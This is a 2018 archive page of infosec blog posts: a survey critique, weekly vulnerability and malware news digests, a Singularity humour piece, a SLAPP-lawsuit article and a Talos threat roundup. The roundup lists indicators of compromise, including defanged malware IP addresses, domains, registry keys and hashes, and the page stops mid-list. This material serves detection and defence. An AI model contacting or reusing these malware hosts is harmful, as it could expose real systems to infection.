Daily Archives: September 7, 2018

NBlog Sept 8 – chew before swallowing

The Global State of Online Digital Trust is a typical vendor-sponsored piece, a white paper (= marketing promotion in the guise of a 'survey') prepared by Frost & Sullivan for CA Technologies.

I say 'typical' in that they have disclosed hardly any information about the survey method and sample. press release instructs us to see the report for "Full survey methodology details" but unless I'm blind, it looks to me as if someone either 'forgot' to write the materials-and-methods section or casually neglected to incorporate it in the published report.  Oh dear.

A CA marketing VP called it "a survey of 1,000 consumers, 350 cybersecurity professionals and 325 business executives from all over the world" whereas the press release referred to it as "The global online survey of 990 consumers, 336 security professionals and 324 business executives across 10 countries". 

We can only guess at how they might have assigned respondents between the three categories e.g. who would not qualify as a 'consumer'? Wouldn't a CISO fall into all three groups? In the report, numbers next to the graphs appear to indicate the sample sizes up to about 990

Last time I checked, there were rather more than 10 countries in the world aside from USA BRA UK FRA GER ITA AUS IND JPN and CHN as listed the report. If I'm interpreting those abbreviations correctly, that's well short of "all over the world".

If indeed the survey was online, that rather suggests the sample only consisted of people from the ten countries who were happy to answer an online survey - which itself implies a degree of trust in online security as well as a willingness to respond to a vendor-sponsored survey. 

It is unclear whether or how the report's conclusions relate to the survey findings ... and they are somewhat predictable given the report sponsor's commercial interests:
"CULTIVATE A CULTURE OF SECURITY Implement data protection policies that are in accordance with the world’s strictest data privacy regulations. Ensure company-wide familiarity with security policies, including among non-technical staff to reduce the risk of data breaches. 
START AT THE TOP Too many business executives see security initiatives as a negative return on investment. Alert the C-Suite to the tangible business impacts of a breach and a loss of consumer trust. 
COVER YOUR BASES Consumers consider both social and technical factors when determining whether to trust an organization; be sure that your organization has the technical foundation in place to mitigate attacks and have a response team ready to minimize damage to consumer trust in the event of a breach. 
KEEP IT SIMPLE Clear communication from organizations around policies and data handling practices is critical for building trust. Far too many organizations overestimate the degree to which consumers can easily manage their personal data online. Present your policies in simple language, and provide important details without overwhelming the consumer."
So they evidently equate "a culture of security" with data protection, data privacy and data breaches. Spot the common factor. A similar bias towards privacy law compliance and the protection of "customer data" is evident in all four paragraphs. That is an important issue, I agree, along with "cybersecurity" (an undefined term ... but I guess they mean IT security) but what about all the rest of information security: trade secrets, intellectual property, business continuity, physical and procedural security, information integrity, blah blah blah?

I freely admit to being heavily prejudiced in favour of both cultural development and management-level security awareness but their emphasis on breach impacts and consumer trust once again betrays a myopic focus on privacy breach incidents, while the conclusion about return on investment seems very suspect to me. I wonder if the survey question/s in that area were unambiguous enough to be interpreted in the same way by all the respondents? Or are the reported differences between the groups of respondents merely indicative of their distinct perspectives and assumptions? Did they even face the same questions? We can't tell since they choose not to disclose the survey questions.

The report introduces the term "Digital trust index". Sounds great, right? A metric concerning trust in, errr, digits? A percentage value relative to, um, what exactly? Oh let me guess, relative to the score conjured out of the air for this, the first report. And unfortunately for the sponsors, the term "Digital Trust Index" is already in use elsewhere.

Overall, a disappointing and essentially pointless read, like most other commercially-sponsored and heavily-promoted "survey" I have read in my career with few exceptions. 

Clearly, I'm a slow learner, stubborn as an old boot. Venting my spleen through this blog is immensely helpful though, along with the vain hope that you might perhaps be persuaded to take a more critical look at the next "survey" that plops onto your screen. Chew it over rather than swallowing whole.

Security Flaws & Fixes – W/E – 090718

Android Blasts Sensitive Info Via WiFi Broadcasts (09/04/2018)
Scientists at Nightwatch Cybersecurity has discovered that system broadcasts by Android expose information about the user's device to all applications running on the device, including the WiFi network name, local IP addresses, DNS server information, and the MAC address. By listening to these broadcasts, any application on the device can capture this information to bypass permission checks and existing mitigations. All versions of Android running on all devices are believed to be affected including forks (which powers Amazon's FireOS). Google fixed the issue in Android 9 but has no plans to patch earlier versions.

Cisco Advises on Vulnerabilities Found in Its Products (09/06/2018)
Cisco released a number of advisories to address vulnerabilities across its product lines. Among the most critical issues are a buffer overflow bug in the vendor's RV110W, RV130W, and RV215W Routers Management Interface and an unauthorized access issue in Umbrella products.

Mozilla Pushes Out Updates for Firefox and Firefox ESR (09/06/2018)
Mozilla has issued updates for Firefox and Firefox ESR. These updates address serious security issues and users are instructed to download them for risk mitigation.

Multiple Issues Fixed in Latest Version of Opsview Monitor (09/06/2018)
Core Security posted an advisory for Opsview Monitor due to multiple vulnerabilities. These issues could result in, among other things, remote code execution and cross-site scripting. Opsview was notified in May about these vulnerabilities and released updates in August. Opsview Monitor is used by DevsOps personnel to "deliver smarter business services by providing unified insight into their dynamic IT operations whether on-premises, in the cloud, or hybrid," according to the vendor.

Open-Source Web Interface OctoPrint Exposes Thousands of 3D Printers (09/04/2018)
Nearly 4,000 instances of OctoPrint, an open-source 3D printer Web interface, are accessible online, leaving printers exposed to cyber attackers. Researchers at the SANS Internet Storm Center reviewed results from Shodan and learned that thousands of OctoPrint interfaces are available online, including 1,585 in the US alone. The scientists warn that this issue is a security nightmare because OctoPrint allows for the download of 3D objects in G-code, which are unencrypted text files. If downloaded, G-code files can swipe data. Cybercriminals can also send malicious G-code files and instruct the exposed device to print them.

Oracle: Some of Our Products Affected by Apache Struts 2 Zero-Day Bug (09/04/2018)
Oracle has warned that some of its products are vulnerable to the critical Apache Struts 2 vulnerability that is being exploited in the wild. However, the vendor has stated that not all of its products that incorporate Struts 2 are necessarily affected. Oracle recommends that customers frequently review the original advisory, which lists affected products and versions, and plan to apply the updates as soon as they are released.

Philips e-Alert Unit Found to Have Multiple Security Issues (09/04/2018)
An ICS-CERT advisory gives details regarding multiple advisories identified in the Philips e-Alert Unit, which is a non-medical device. Version R2.1 and prior are vulnerable. It is recommended that users review materials on Philips' Web site for mitigation and update information.

RCE Bug in PHP Package Server Receives Patch (09/04/2018)
Security researcher Max Justicz found a remote code execution vulnerability on packagist.org, the default package server behind Composer, a PHP package manager. Packagist serves about 400 million package downloads each month. The vulnerability was reported and has since been alleviated.

Routers' Automatic DNS Registration and Autodiscovery Cause Security Risks (09/05/2018)
an advisory from US-CERT details an issue in which routers auto-registering names on LANs can result in the loss of confidentiality and integrity of any network activity by providing for the opportunity to view network packets. If an attacker with access to the network adds a malicious device to the network with the name 'WPAD', such an attacker may be able to utilize DNS autoregistration and autodiscovery to act as a proxy for victims on the network, resulting in a loss of confidentiality and integrity of any network activity. Home/office LAN/WLAN routers should not auto-register to their local DNS magic names related to autoconfiguration. Furthermore autodiscovery features should not accept mDNS based names as authoritative sources.

Third-Party Company Issues "Micropatch" for Microsoft Zero-Day Flaw (09/04/2018)
A local privilege escalation vulnerability has been fixed in Windows Task Scheduler but it wasn't Microsoft that patched it. The security team at 0patch, which issues small fixes for vulnerabilities or "micropatches," delivered a 13 KB patch. It is expected that Microsoft will issue its own fix in its September batch of security patches.
Upgrades Mitigate Security Bug in Opto22 PAC Control Basic and PAC Control Professional (09/05/2018)
A stack-based overflow vulnerability could cause a crash and then result in a buffer overflow condition in Opto22's PAC Control Basic and PAC Control Professional. Users have been instructed to upgrade to the latest version. The ICS-CERT has also posted its own advisory.

Malware Watch – W/E – 090718

Aggressive MagentoCore Skimmer Taints Over 7,000 Ecommerce Sites (09/05/2018)
MagentoCore has become the most prolific online skimmer after it was determined that over 7,000 individual stores have been turned into zombie money machines. At least 1,450 stores have hosted the MagentoCore.net parasite since February. The MagentoCore skimmers gain illicit access to the control panel of an ecommerce site, often with brute force techniques by automatically trying lots of passwords, sometimes for months. Researcher Willem de Groot analyzed the skimmer and identified 7,339 ecommerce sites that have been infected.

Latest Apache Struts Bug Exploited to Mine for Monero (09/06/2018)
A remote code execution vulnerability for Apache Struts 2 that was released in August is being exploited in a cryptocurrency mining campaign. F5 researchers identified the campaign as "CroniX" and spotted it two weeks after the new Struts 2 vulnerability was first discovered. CroniX mines for Monero.

Microsoft's WMIC Utility Abused to Download Malware (09/04/2018)
Cybercriminals are using Microsoft's Windows Management Instrumentation Command-line (WMIC) utility and an eXtensible Stylesheet Language (XSL) file, which typically would not be threatening, to push out malware, the researchers at Symantec say. WMIC is being used to download malicious files as part of the multi-stage infection chain. The researchers hypothesize that the miscreants are using this tactic to avoid detection.

Sophisticated CamuBot Malware Targets Brazilian Banks and Customers (09/05/2018)
IBM's X-Force researchers reviewed CamuBot, a financial malware targeting Brazilian banking customers. The malware's operators are actively using it to target companies and public sector organizations, mixing social engineering and malware tactics to bypass strong authentication and security controls. CamuBot uses new code, doesn't hide its deployment, and promotes bank logos and brand imaging to make it appear as a legitimate application.

Cybercrime – W/E – 090718

Malicious Android Campaign Takes Aim at the Middle East (09/04/2018)
Symantec has shared details about the APT-C-23 threat group that has targeted victims in the Middle East, registered hundreds of domains, and infected thousands of people in more than 20 countries. The group uses chat applications and fake updates to popular apps to hide its malware and distributes the nefarious files via SMS with a URL to Google Drive or a command and control domain that hosts the Android Package Kit.

OilRig GroupThreat Entity Continues to Plague Middle East with OopsIE Trojan in Tow (09/06/2018)
The OilRig threat group is hitting entities in the Middle East and using a revamped version of the OopsIE Trojan, research from Palo Alto Networks has determined. OilRig is thought to have connections to the Iranian Intelligence agency and the Islamic Revolutionary Guard Corps. OopsIE, which was first identified in February, is a data exfiltration malware, but the latest variant includes significant updates to its anti-detection techniques.

The Ties that Bind: Research Links Threat Groups with Chinese Government (09/06/2018)
APT10, a threat actor thought to be in China, may have ties to the Chinese Ministry of State Security (MSS). CrowdStrike cited research from other security vendors and explained that APT10, which is also known by various other names including Stone Panda, was analyzed by an anonymous group called IntrusionTruth, which found several instances that connect the threat entity with the Chinese security agency. CrowdStrike warned that another group, Gothic Panda (also known as APT3), has connections to MSS.

Thousands of MikroTik Routers Attacked to Eavesdrop on Traffic (09/06/2018)
Over 7.500 MikroTik routers are being exploited by cyber thieves using a vulnerability to intercept Internet traffic. The vulnerability, which is found in Winbox, a component to the MikroTikRouterOS software, lets the thieves gain access to routers that have Socks4 proxy enabled. Further details regarding this issue have been made available by 360 Netlab.

Hackers and Worms in the Singularity

So I saw an ad for this project, “OpenWorm.” Seemed like it checked all the boxes that cause me to click a link:

 

  • Vaguely open source

  • Something to do with Legos

  • Robots

  • Has an app associated with it. “Get the App!”

  • And it’s for “real worm geeks!”

  •  

I consider myself a geek, and I’m real. Except, what the hell is the worm part? And even though I’m a real geek, I’m not a “worm geek.” Eeewww.

 

Turns out that the OpenWorm project is trying to digitally simulate the mind of one of Earth’s simplest creatures, the C. elegans nematode, a microscopic worm with only 302 neurons and 95 muscle cells. Researchers have scanned C. elegans and uploaded its neural map into a docker container or something, where you can troll it with various stimuli and model its reactions.

 

Its tiny brain is even smaller than those of many YouTube celebrities and can easily fit into an app on your phone.

 

image

RAY KURZWEIL

Photo by Michael Lutch. Courtesy of Kurzweil Technologies, Inc., CC BY 1.0

 

The Singularity

 

The OpenWorm project reminds me of an upcoming event that’s going to solve all my aching-old-man problems: the Singularity. Coined by futurist Ray Kurzweil, the Singularity is defined as the moment when human consciousness merges with, or is surpassed by, artificial intelligence. After that moment, history will be defined as “prior” and “afterthe Singularity, because civilization will change radically.

 

There are two possible pathways to the Singularity. The optimistic route is that science will figure out how to scan a human mind and upload it into the cloud while preserving its consciousness. Once we’ve shuffled off this mortal coil, we’ll all be immortal. The OpenWorm project is a baby step toward that goal of immortality.

 

I’m already looking forward to picking out a sporty android body to carry my artificial intelligence around. Brand consultants at Tesla should be on this, because people are going to be self-conscious about what model of robot body they are rocking.

 

There’s a second, darker path to the Singularity. You’re eating your Wheaties and reading the paper in the morning and you tell your life partner, “Hey, babe, it says here that those ‘geniuses’ at Google created an artificial intelligence that achieved consciousness. And, yup, it’s already decided to exterminate the human race. Knew this would happen. Thanks, Obama.”

 

In this darker scenario, evil-looking male robots will be assigned to hunt and track human scum in the shelled-out underworld of Mountain View, California. It’s a trope we’re all so familiar with and no one will be surprised if it happens.

 

Stop and consider for a moment. What will the role of hackers be in the Singularity? It depends on how we get there.

 

Hackers in the Singularity

 

On the “light” path, where human minds migrate into computers, hacking will becoming the worst possible crime that anyone could commit. Hacking someone else’s mind could be tantamount to murder (or “real-death” in Altered Carbon lingo), or slavery. Hackers will be the equivalent of demons attacking your mind. Imagine you and your bestie are walking down Robson Street in your Tesla model XY robot sleeves, when suddenly your friend freezes and the words “ALL YOUR BASE ARE BELONG TO US” starts scrolling across his face. “OMG, dude. You’re being hacked right now!” you exclaim, and you try to summon the Royal Canadian Mounted Cyber Police. But the only acknowledgement you receive is “IM IN UR BASE KILLING UR D00DZ,” and you realize you’re being hacked, too. Chilling, isn’t it?

 

On the “dark” path, Google Exterminator™ droids are using advanced data analytics to find the last pockets of human resistance to show them ads immediately prior to dispatching them. Hacking, in this world, will become humanity’s greatest hope, and hackers will be heroes. They will be freedom fighters like John Connor or Moses, and the black hoodie will be the symbol of resistance and liberation. Hackers will finally breach G Suite, perform lateral movements, and smash its defense grid.

 

Now, isn’t that interesting? On one path to the Singularity, hacking is the worst possible crime. But on the other path, hacking is humanity’s highest calling. Either way, the absolute value of hackers is going to be maximal. If you’re a young reader trying to choose a career, infosec should be an even more enticing option now that you’ve gamely read this whole article.

 

There’s an artificial intelligence conference in Australia that polls its attendees about when they think the Singularity will happen. Most recent guesses say 2040, though some predict it will come as early as 2020.  Guys, that’s super close. The Texas Rangers, bless their hearts, have never won a World Series and may never get a chance to do so, because one assumes that, in the Singularity, all baseball games will be simulated inside silicon-based computers and have team names like the Dell Blades, the Intel Insides, or the Nippon Ham Fighters (oh, wait, that last one is already taken).

 

Since it’s looking like the Singularity will be a thing before I succumb to liver cirrhosis, I can probably stop contributing to my flaccid 401(k) retirement plan, because who’s going to need those in the Singularity?

 

Copyright 2010 Respective Author at Infosec Island

Join us in fighting back against powerful corporations trying to silence news and advocacy organizations

Protest the Protest

This week, Greenpeace—along with Freedom of the Press Foundation and dozens of other advocacy groups—are launching an important campaign called Protect the Protest, which aims to draw attention to dangerous tactic that corporations use all too often to chill the free speech of Americans.

SLAPP suits, or “strategic lawsuits against public participation,” are brought by wealthy individuals or organizations in an attempt to silence critical speech --- powerful people bring these type of libel lawsuits knowing they won’t win on the merits, but they hope they can silence critics by bleeding them dry of resources or bankrupting them altogether.

Greenpeace is the defendant in two particularly egregious lawsuits that we wrote about earlier this year that actually accuse Greenpeace of violating the RICO statute—a law used to go after organized crime—for engaging in routine advocacy. These type of lawsuits chill the speech of non-profit organizations and protesters, and prevent public transparency and accountability of those in power. The suits also directly impact press freedom.

SLAPP suits are particularly dangerous when used against journalists and news organizations. In the past few years, we’ve seen several high profile cases ofextremely wealthy individuals and corporations threaten to sue or actually sue public interest news organizations for libel over stories which they didn’t like.

The non-profit news organization Mother Jones had to fend of an incredibly expensive lawsuit against a billionaire political fundraiser a few years ago that they were worried may ultimately bankrupt the organization. The civil liberties news website Techdirt faced a similar lawsuit that had them contemplating shutting their doors last year. (Both eventually won their cases.)

And of course, billionaire Peter Thiel infamously funded a series of lawsuits that ultimately destroyed Gawker.

The billionaire with the most prolific history of bringing lawsuits against journalists who report critically on him currently occupies the White House. Donald Trump brought over half a dozen SLAPP lawsuits against journalists over his decades in public life and has threatened over a dozen more.

It’s important to emphasize in almost all these cases, the lawsuits were never going to win. Anyone who glanced at the stories in question could tell the speech of the defendants was protected by the First Amendment. The problem is these powerful people often don’t care about winning, they care about inflicting damage. Maybe they will be able to decimate the news outlet by forcing them to spend millions in legal fees. Even if the plaintiff loses, the next time the news outlet will think twice before going forward with an investigation. Or maybe they’ll scare the countless other news organizations who may be planning similar stories.

(Note: while Gawker did lose an invasion of privacy case that eventually bankrupted the company, it had several other libel suits funded by Thiel that were pending, all of which were standard SLAPP suits. The invasion of privacy case would’ve likely been overturned by an appeals court if Gawker had the funding to continue fighting.)

Ultimately, the Protect the Protest campaign is not just about Greenpeace. Luckily, they have an excellent team of lawyers and have decided to very publicly fight back against these dangerous threats. I have no doubt they will prevail. This campaign is about protecting all of the smaller non-profits, the smaller news organizations who will think twice about reporting on people in power due to the fact that they know they may be subject to millions of dollars of litigation for speaking out. And we are proud to stand with them as they expand this fight.

You can find more information about the campaign here, and here’s how you can join the fight.

Threat Roundup for August 31 to September 7


Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Aug. 31 and Sept. 7. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

  • Win.Dropper.Generickdz-6671833-0
    Dropper
    This is a BobSoft Delphi application that wraps malware. In the current campaign, the HawkEye spyware is installed. The malware uses process hollowing to keep itself hidden from detection, and achieves persistence across reboots by leveraging an autostart key in the Windows registry.
     
  • Win.Dropper.Kovter-6669952-0
    Dropper
    Win.Dropper.Kovter-6669952-0 is a dropper written in Visual Basic. It is distributed via email, and makes use of PowerShell scripts and large objects in the registry to conceal its embedded malware.
     
  • Win.Dropper.Upatre-6669126-0
    Dropper
    Win.Dropper.Upatre-6669126-0 is dropped by a Word document in our ThreatGrid sandbox. The sample potentially performs a code injection circumventing Windows' DEP through memory pages allocated with PAGE_EXECUTE_READWRITE permissions.
     
  • Doc.Dropper.Valyria-6668024-0
    Dropper
    Doc.Dropper.Valyria-6668024-0 is a malicious Word document that drops malware. The campaign currently spreads the Emotet malware.
     
  • Doc.Dropper.Chronos-6667983-0
    Dropper
    This malicious Word document was discovered after it dropped an executable in our ThreatGrid sandbox. The campaign currently delivers a banking trojan, which will redirect internet traffic through the malware's proxy and try to steal banking credentials.
     
  • Win.Packed.Generic-6667111-0
    Packed
    This is a Visual Basic executable that will change proxy settings on the victim's machine to inspect internet traffic and thus steal information. It also tries to steal local passwords from the browser's password database.
     

Threats

Win.Dropper.Generickdz-6671833-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\33fd244257221b4aa4a1d9e6cacf8474
  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4c8f4917d8ab2943a2b2d4227b0585bf
  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
  • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
  • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: MJOXV418GJ
Mutexes
  • 8-3503835SZBFHHZ
  • 59802CRW6VIZ62Az
IP Addresses
  • 141[.]8[.]225[.]75
  • 43[.]230[.]143[.]219
  • 198[.]46[.]86[.]224
  • 122[.]14[.]210[.]142
  • 52[.]5[.]251[.]20
Domain Names
  • www[.]americasculturalstudies[.]net
  • www[.]danhbaviet[.]com
  • www[.]kegodanang[.]com
  • www[.]www970234[.]com
  • www[.]vhecha[.]com
  • www[.]sevbizleadservices[.]com
Files and or directories created
  • %AppData%\59802CRW\598log.ini
  • %AppData%\59802CRW\598logim.jpeg
  • %AppData%\59802CRW\598logrc.ini
  • %AppData%\59802CRW\598logri.ini
  • %AppData%\59802CRW\598logrv.ini
  • \TEMP\2995593463.exe
File Hashes
  • 00394f8ccd70206920aea6b84cbd14fbfbecd31b9bf7542673793a5c5a35707b
  • 02acbf303617a6661d7f4e994e70508bfd22664452bf27a40af78d7d6e811a1c
  • 046089a17b9742839f5b173f0bf7694e5326e7dcb1a641357cd79827e75f5c51
  • 059e7346e2e8307976cd22f25c51c881d09d11cc59e68e7c7de912ad108c17af
  • 0843abfc1b86ea35e3042507656e81ed7edfff6805702bc418189ac3dd5f6f81
  • 098766c1ee42b13020947978225d9c48e9666c3b326c1f991daf20cde18fb3e0
  • 111b5ab7085c2ab5b75a159eab016668e8c8143b036a8d702be12a69c59be2cd
  • 1157af4bb297bce9c745c387cd66ac19ae4d9f7ee4b5e7a63a6af74defdd389d
  • 12668eb53e18ed75aaac9e82e5ff5ecbf62dfa3034fd4870bbe33b1abe3c89f6
  • 14c8abf43a6cd9337a963f408a8057a880a9c64e383d853829e7f3e4dc354d78
  • 178d41ab9c193b735b37f10e3ef74df84da6cf21fc1bd6c322116d71f6afceb5
  • 1a4054a1714bb64958e6823aa2418a9317d25b24b20f0666199aceb39b5c1c8f
  • 1d4c1dbf89ce24cc7716c9a71a9f8564b93777d715ef484b25fa81bb368c944f
  • 1f4018562d03ff36c05bb9c6691eaee8e4e9ff7965799bd8abc557b86037fe2e
  • 24a76b75a5d387f434a1f4e0f4cfc2aea7176b293ceb9a9511f0aa0c64191e28
  • 29918b68f79c9fb878be4e91dbb81322684b93f0ae9e5743c94de962c7df21ef
  • 2a45c9616dd0518b91c14c6ace489938010886acc7a9dd9a0c3280717fc8d76b
  • 2b4b76c60b34230544419025df8bde3521435d2224e6b0953f5c9417068f6902
  • 2b56221522af3985b09d9ddce4c064a6b157c82698795645a6f5113a177558ff
  • 2c867c08a31b7dd9e4b5c82f16c13431e8a739b983b1e065d40d2768575e7676
  • 2cf0f40a3edc2df3aa1f7be9cdb7100b91b5f9c32575fd6a5e22aad9fc113546
  • 2f62e170384a7960dd937d2242734fd3eddef43ebed31d57d51d69d0eb5ea376
  • 315680ac90ad07c9d05301fe99f23e864b1c38cd1950caf9e7f3ca9447b16b13
  • 328ba025dadc6148fb83dc34d03b519642de0122d41baabd046133efcfe69eca
  • 36b321fd86f75d186e978708789000e45a2a38e436e862c0814524aff5832a8c

Coverage


Screenshots of Detection

AMP



ThreatGrid



Umbrella



Win.Dropper.Kovter-6669952-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SOFTWARE\WOW6432NODE\3E00E5E2D21AC4F4EC6F
    • Value Name: CA640AB774DC8DC9D58
  • <HKLM>\SOFTWARE\WOW6432NODE\EDXF9XO
    • Value Name: MWZPeJZV
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: 8567f942
Mutexes
  • B3E8F6F86CDD9D8B
  • EA4EC370D1E573DA
  • A83BAA13F950654C
IP Addresses
  • 178[.]137[.]207[.]147
  • 68[.]143[.]202[.]61
  • 20[.]143[.]75[.]211
  • 23[.]175[.]186[.]69
  • 130[.]197[.]216[.]217
  • 211[.]129[.]1[.]101
  • 179[.]8[.]135[.]228
  • 27[.]108[.]150[.]40
  • 99[.]223[.]4[.]221
  • 64[.]94[.]71[.]76
  • 89[.]150[.]126[.]91
  • 106[.]243[.]136[.]116
  • 100[.]246[.]196[.]247
Domain Names
  • N/A
Files and or directories created
  • %LocalAppData%\Temp\pygjwa3p.ah2.ps1
  • %LocalAppData%\Temp\tgzjqzza.auy.psm1
  • \TEMP\b9a27f6553f2b34d18b9c1dd49e5877e30a9c9a38147f376b20f2cf9913aabad.exe
File Hashes
  • 02ae96fd92bfc617880a78a74775b470530b8a59e4f262f9f2f203df3d37e2e5
  • 05f9a381f9effeb6f4fc839190fa4c543e0f1bdcf63fafceeb5db42a987e0f85
  • 06215d43b7cddf9072b2f1ff0e8d0706327869253be4517691be138f9aa29268
  • 09ee56b008a1b971d845770057eb2f4e775b3706e412d827a1f3e573d78f1cb1
  • 0a905d26c03a3cbd88f90f97b5e0849b3ec5b9c25c1992ac0871efd93d9772a5
  • 0bf1866ee7b371ea3ffcbe049693010be5f5ab74517256e970383a3449899c52
  • 0c7b21d7d7bde5649d9b0a27e5199b3619daa79541ba74d78ccece91be32fadf
  • 0d078dd1069c996c028a71c2f10e899ba57530462893976221575ae8002ee87f
  • 0dd870a8f9a739f4c0086222ae8c2b1b1d854915a41ddadb7da850a4238be5ea
  • 0ec00e8c4277610ef9eeb5a002211b55989fa86272a020a4f1a79da996ed135f
  • 0edf3f0a681bd1d63e52e37fd0f97c679c91ec081c122542eb3e62e516523ac5
  • 10d2611321e6dd0c1afaa76ffe9c84590e64b99be2411364367728e5075dfdd2
  • 11800040629ce430c329e00da4a3ffc58abb3127f4ea2406d5901a72523c20e8
  • 11dd6cab51f57bb544e6716c280dc69168a2c6ff1581fde2dc2f8c1b1fcc5f3c
  • 12a724b16c05304dcee66991b14c8ca0cc2f3378f5453a1c8dea2bd6211ca95a
  • 1756ea4aa42a81db282be52f2286c746e82a9b87c8c9c10e86f921431e4709df
  • 184cc70b7587abded0ed5631efbdbd86f9fb8f6095339004b589305040dc0bdf
  • 18a7c88bb1278d0cab2e6d5921766bd9896005438a65cb8b5a13546504051d3f
  • 1f8496e44016241a59b753bb73b542f703ad6e7ea098d2e50ec348b773248fe3
  • 1fc7cb727185acd0e714ab24e36639ff5ecc00958ef62ff7287f64e388d777d3
  • 22bada759f4bb6df82936b3572a79f49717dd49d584c48ce89f7b264ba187be5
  • 22c56863b80073a1e6a32c508ff5ab4300af300d773e06732dd6666dfc0d7809
  • 24dc47adb4ead7d8672a4acba6b6aeb80604237ab85ef40aa9cd2e9abcddfe1b
  • 24f462ad25761340aceec33dc166d393e49d8f577ff479d59414f7ecfad49ba1
  • 2782831911a60287dd208a98abc012276b32165c04c86ccd43909471a1d557f9

Coverage


Screenshots of Detection

AMP




ThreatGrid




Win.Dropper.Upatre-6669126-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses
  • N/A
Domain Names
  • N/A
Files and or directories created
  • %LocalAppData%\Temp\vipkewek.exe
File Hashes
  • 00d293d627361d3618fa9e362b2ddac1fcf1a04b05a922955433a4c6954a3be7
  • 034c2de6a80f13e6ad299baaf194d14747f6b29a1b31c0e4f76505430d2dcfe9
  • 04e26fd503240400e6f170f9d58b2a7779d55792353420ba5a69d41d1a336917
  • 0dce7497a6ecd7fdeb0507686a599143b50c94b6026fa5d4a9521b511197a811
  • 105e7235d88d55a70081661f8faa327bc70a40202158b54c8042dc1ff29bd1ab
  • 11c4857c3aea5fc889f39c16a934c975519b1681fcc9fd4c1d8d68fdf6b48ecb
  • 18ba26eae4fd5e66b71d0d2fc666c4a5214bca27fc9af00fc9a59be3ac308618
  • 1e729c31ef2c631cab9b51dc554c4639c86a627faeacf9f6fb73c50b71dea394
  • 26b78a06a970f10e4cf007562c13bbe2d0f0e467681fcf5be0e1770b167dc7b2
  • 273610d574c0af8b0d38eefb115c2b7794dab0c898262997f735755503881291
  • 2fb5f53517290027fbb94b0c0f639aa8cbb974f726f650bda8ea09ee38a9ce54
  • 3199bf691f8a15477f1a5c82e060c80a83bee44d30b6a1874bd7c6e1015e1ec3
  • 4cbdcf8cd9e6b5137e1f0917bea59a4af48387ef07239d47ca68806de7f04f2c
  • a3dfa314702e5e2d7c9242952b33f80ea17e458704d8e6cff49a79f45e1bc7ed
  • ac711b4cc1dd6a307459fe054a1087539e498fd4990867e53c3b8ed85b223e9c
  • b1ec88fd601802d028ec2f6e4501c5a7e934dd1a92ed0934a6d5505ac691fe9d
  • bd0b11fc2ac479598c102436512cff35712af23384a2d7e4ae0b3c329069017d
  • bd1291cb722bcbd10d2c059c672901835d1951d16e35b5091c3b5a44ea081913
  • c19c02baf1bd12e1d8fb4cc31d70b34e8a5f9110ac4423677cd82fdaa019c5fc
  • e6a75ac727881f772f2dd936b8125de06e3c31f3faa86ff285c5540d671faedf

Coverage


Screenshots of Detection

AMP



ThreatGrid




Doc.Dropper.Valyria-6668024-0


Indicators of Compromise


Registry Keys
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
    • Value Name: WpadDecisionTime
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\94-AF-8E-F4-CD-0F
    • Value Name: WpadDecisionReason
  • <HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS
    • Value Name: ld3
Mutexes
  • Global\I98B68E3C
  • Global\M98B68E3C
  • PEM1E4
  • PEM1A0
  • PEM9C8
IP Addresses
  • 69[.]201[.]131[.]220
  • 66[.]115[.]238[.]16
  • 67[.]222[.]19[.]143
  • 213[.]123[.]182[.]53
  • 138[.]128[.]170[.]114
  • 198[.]71[.]233[.]104
  • 128[.]2[.]97[.]187
  • 103[.]215[.]137[.]24
  • 200[.]58[.]111[.]124
  • 8[.]39[.]54[.]102
  • 211[.]100[.]47[.]32
  • 62[.]254[.]26[.]235
  • 151[.]236[.]32[.]35
Domain Names
  • blog[.]bctianfu[.]cn
  • tropicalislandrealtyofflorida[.]com
  • smtp[.]office365[.]com
  • mail[.]vcacademy[.]lk
  • mail[.]lareservasuites[.]com
  • imap[.]1and1[.]co[.]uk
  • mail[.]serviciodecorreo[.]es
  • mail[.]1and1[.]es
  • mail[.]billsmachinesvc[.]com
  • mail[.]royalholidaypalace[.]com
  • mail[.]goodleathergroup[.]com
  • mail[.]tlb[.]sympatico[.]ca
  • smtp[.]gmail[.]com
Files and or directories created
  • \efsrpc
  • %UserProfile%\707.exe
  • %WinDir%\SysWOW64\LDCjSm5OOdIv.exe
  • %LocalAppData%\Temp\zzdz1frv.zq1.psm1
  • %LocalAppData%\Temp\idwlwvc1.j0h.ps1
  • %WinDir%\SysWOW64\nZJz1AtlwhH6.exe
File Hashes
